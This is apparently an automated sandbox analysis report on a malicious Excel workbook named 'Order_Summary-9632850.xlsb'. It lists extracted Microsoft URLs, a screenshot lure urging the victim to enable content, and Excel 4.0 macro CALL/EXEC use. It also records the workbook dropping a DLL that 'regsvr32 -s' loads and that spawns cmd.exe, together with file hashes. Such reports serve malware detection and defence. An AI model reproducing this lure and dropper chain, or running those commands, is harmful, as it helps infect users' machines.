Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://login.windows.local
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://management.azure.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://management.azure.com/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://messaging.office.com/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://officeapps.live.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://onedrive.live.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://outlook.office.com/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://pages.store.office.com/review/query
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://settings.outlook.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://store.office.com/addinstemplate
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://tasks.office.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://templatelogging.office.com/client/log
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: Enable editing " to unlock the editing document downloaded from the Internet. . , " El 14 Protecte
Source: Screenshot number: 4	Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start ' ,, , , 18 the decryption of

Found Excel 4.0 Macro with suspicious formulas

Source: Order_Summary-9632850.xlsb	Initial sample: CALL
Source: Order_Summary-9632850.xlsb	Initial sample: CALL
Source: Order_Summary-9632850.xlsb	Initial sample: EXEC

Office process drops PE file

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\kdldyeff.dll			Jump to dropped file

Abnormal high CPU Usage

Source: C:\Windows\SysWOW64\regsvr32.exe

Process Stats: CPU usage > 98%

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll 337A487F1CB8F16200A5D14CAC1DAC3478E95CF3077B3872D319970131BEA702
Source: Joe Sandbox View	Dropped File: C:\Users\user\kdldyeff.dll 337A487F1CB8F16200A5D14CAC1DAC3478E95CF3077B3872D319970131BEA702

Tries to load missing DLLs

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

Source: classification engine

Classification label: mal88.expl.evad.winXLSB@5/10@0/1

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{9D11D15E-C66E-40D8-82BE-500D324727B3} - OProcSessId.dat

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Order_Summary-9632850.xlsb	Initial sample: OLE zip file path = xl/media/image1.png
Source: Order_Summary-9632850.xlsb	Initial sample: OLE zip file path = xl/media/image2.png
Source: Order_Summary-9632850.xlsb	Initial sample: OLE zip file path = xl/media/image3.png
Source: Order_Summary-9632850.xlsb	Initial sample: OLE zip file path = xl/media/image4.png
Source: Order_Summary-9632850.xlsb	Initial sample: OLE zip file path = xl/media/image5.png

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Data Obfuscation:

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_029A1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,

3_2_029A1030

Registers a DLL

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_04602AF0 push dword ptr [edx+14h]; ret

3_2_04602BFD

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\kdldyeff.dll			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\kdldyeff.dll

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\kdldyeff.dll

Jump to dropped file

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Found dropped PE file which has not been started or loaded

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll

Jump to dropped file

Anti Debugging:

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_029A1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,

3_2_029A1030

Contains functionality to read the PEB

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_029A1030 mov eax, dword ptr fs:[00000030h]	3_2_029A1030
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_048E095E mov eax, dword ptr fs:[00000030h]	3_2_048E095E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_048E0456 mov eax, dword ptr fs:[00000030h]	3_2_048E0456

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_029A1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,

3_2_029A1030

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\regsvr32.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe

Jump to behavior

Yara detected Xls With Macro 4.0

Source: Yara match

File source: app.xml, type: SAMPLE

ID:	432380
Product:	CloudBasic
Start time:	08:46:14
Start date:	10.06.2021
Sample:	Order_Summary-9632850.xlsb
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	d091fb57338164acff3bd648a1782fd9
SHA1:	ca63bade67055580f6be380cd41bb98affd5de49
SHA256:	12bbd7661b6fd48f3552101588625bde0709dd68b28a0677d000a02389e3b812
Filetype:	Excel Microsoft Office Binary workbook document (47504/1) 49.74%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\B709A3E3-2143-4926-A150-50001F594891	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators	CE83A4FE75C04F9829A018CAC9873215	FF0231EC5EB1FE9DB253BDB3898D2A3B0F00DF64	1853351F3FB3BAB351C2ECD5D0E5F2B07E9770B8E2E192E305656D02EBE8D38E
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\22BFE402.png	PNG image data, 264 x 113, 8-bit/color RGB, non-interlaced	B34FB4F2F0F9E70B72BA3AFD028CD97C	C6868336F78DEA1E718965DF3341039581DB5B5A	189D420D344A694FD1928ABACBEC94D9F0EF52BE036CEB8144A9D9A6DD14EAEB
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\32EACCC5.png	PNG image data, 168 x 72, 8-bit/color RGB, non-interlaced	C7ED6FC355D8632DB1464BE3D56BF5CC	615484A338922DDF00B903CFA48060AD60D70207	26000244FBB0C6B2D76F80166CE85700BC96141C6CD80F8B399CA6F15FE3515C
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7CC9601B.png	PNG image data, 178 x 76, 8-bit/color RGB, non-interlaced	9AD30E24270C495AE68EAF3A1EEECBFB	8642D256E7FFBEF5804A2D2220A1FE475A99DC36	6D3EAD431ABD110369EFABC6F2E474DC24FA3D7EEC28DE43456407C5BACD6D20
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8892F2D4.png	PNG image data, 288 x 77, 8-bit/color RGB, non-interlaced	839795652A8FE78F26F4D86D757ABDE8	979E5B90C72EA3E5E9D9B506AFDC981BFCA61B60	1A9EF0E2F66682B532D15457635920067C4F29EF762D2E8A3E0363B4CF39C13E
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F527A360.png	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced	32C83607A5C98C5A634278E5AED3AD61	EDE34ADEA53C413C4AC8215EA48F2F2FD59F1362	4A999E919D85EDD0CD1A772CA3B29F91AEECF77D0BEB11FD1B632B7A8A0686BF
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1E2385B6C669BA98831B97915F6ACEBA	A1966D5CEB273CC669C8D6829E2EC9E842D6E482	337A487F1CB8F16200A5D14CAC1DAC3478E95CF3077B3872D319970131BEA702
C:\Users\user\AppData\Local\Temp\0A910000	data	78842651E96FCD7FF4034398CCB479C0	77D39B8E9585E5FC297F3F8F4A65A40E3C4FFC98	11ECB4E0E7C2B139D3A4BF94DCAEC0212E686F5E3EC3832F2B33C0E5175D4749
C:\Users\user\Desktop\~$Order_Summary-9632850.xlsb	data	7AB76C81182111AC93ACF915CA8331D5	68B94B5D4C83A6FB415C8026AF61F3F8745E2559	6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
C:\Users\user\kdldyeff.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1E2385B6C669BA98831B97915F6ACEBA	A1966D5CEB273CC669C8D6829E2EC9E842D6E482	337A487F1CB8F16200A5D14CAC1DAC3478E95CF3077B3872D319970131BEA702

Analysis Report Order_Summary-9632850.xlsb

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs